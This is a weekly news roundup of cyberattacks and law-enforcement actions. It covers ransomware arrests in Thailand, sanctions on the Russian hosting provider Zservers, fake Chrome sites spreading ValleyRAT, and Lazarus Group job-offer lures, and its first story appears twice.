Weekly Summary Cyberattacks February 6-12

Four hackers linked to Phobos ransomware arrested, 8Base ransomware operation dismantled   

An international police operation has led to the arrest of four suspected hackers in Phuket, Thailand, and the dismantling of the 8Base ransomware group's websites. The detainees, two men and two women of European origin, allegedly extorted more than 1,000 victims worldwide, obtaining $16 million in Bitcoin. The operation, dubbed “Phobos Aetor”, included raids at four locations, where electronic devices and cryptocurrencies were seized. Swiss authorities requested the extradition of the suspects, accused of attacks against 17 Swiss companies between 2023 and 2024. The hackers stole data and encrypted files to demand ransoms in cryptocurrencies, making it difficult to trace the money. The 8Base group's trading and data leakage sites were tapped by European authorities.  

U.S., UK and Australia sanction Russian company linked to cyberattacks   

The United States, United Kingdom and Australia have imposed joint sanctions against Zservers, a Russian bulletproof hosting (BPH) services provider accused of facilitating ransomware attacks. According to the U.S. Treasury Department, Zservers has provided infrastructure to affiliates of LockBit, one of the most active ransomware groups responsible for the 2023 attack against the Industrial Commercial Bank of China in the U.S. The sanctions include blocking property and assets of the company and two Russian managers, Alexander Mishin and Aleksandr Bolshakov, for their role in providing services to cybercriminals. In addition, they prohibit U.S. citizens and companies from transacting with them. This action is part of a joint strategy to dismantle cybercrime support networks and protect international critical infrastructures.  
Four hackers linked to Phobos ransomware arrested, 8Base ransomware operation dismantled   
An international police operation has led to the arrest of four suspected hackers in Phuket, Thailand, and the dismantling of the 8Base ransomware group's websites. The detainees, two men and two women of European origin, allegedly extorted more than 1,000 victims worldwide, obtaining $16 million in Bitcoin. The operation, dubbed “Phobos Aetor”, included raids at four locations, where electronic devices and cryptocurrencies were seized. Swiss authorities requested the extradition of the suspects, accused of attacks against 17 Swiss companies between 2023 and 2024. The hackers stole data and encrypted files to demand ransoms in cryptocurrencies, making it difficult to trace the money. The 8Base group's trading and data leakage sites were tapped by European authorities.  

Fake Google Chrome sites spread ValleyRAT malware   

Cybersecurity researchers have detected a new malware campaign in which fake websites mimicking Google Chrome are distributing the ValleyRAT remote access Trojan. The attack, attributed to the Silver Fox group, particularly targets Chinese-speaking users in regions such as Hong Kong, Taiwan and mainland China, with a focus on finance, accounting and sales professionals. The malware is distributed via a ZIP archive containing a rogue Chrome installer. When executed, it downloads several malicious files, including a DLL that runs ValleyRAT. The technique used exploits users' trust in legitimate downloads and exploits the DLL-searching vulnerability in signed executables. ValleyRAT allows attackers to log keystrokes, monitor screens and establish persistence on the system, as well as execute remote instructions. The campaign reinforces a growing trend in the use of rogue installers to spread malware, affecting unsuspecting users looking to download legitimate software.  

Lazarus Group uses fake job postings to steal cryptocurrency   

North Korean hacking group Lazarus has been linked to an active campaign that uses fake job offers on LinkedIn to distribute malware targeting Windows, macOS and Linux users. According to cybersecurity firm Bitdefender, the attackers lure victims with supposed remote jobs in cryptocurrency and tourism sectors, requesting personal data such as resumes or links to repositories on GitHub. After obtaining this information, cybercriminals send links to fake projects on GitHub or Bitbucket, which contain malicious code designed to steal data from cryptocurrency wallets installed in browsers. In addition, the malware functions as a loader for other threats, including a Python-based Trojan that monitors the clipboard and allows persistent remote access. The methods employed bear similarities to the “Contagious Interview” campaign, already documented by security experts, which uses credential theft via JavaScript and Python Trojans to deploy further attacks. In some cases, victims are required to clone and execute a Web3 repository as part of the supposed targeting process. This campaign, widely reported on social networks such as LinkedIn and Reddit, is part of a larger strategy by Lazarus to infiltrate systems and steal cryptocurrencies through sophisticated social engineering techniques and cross-platform malware.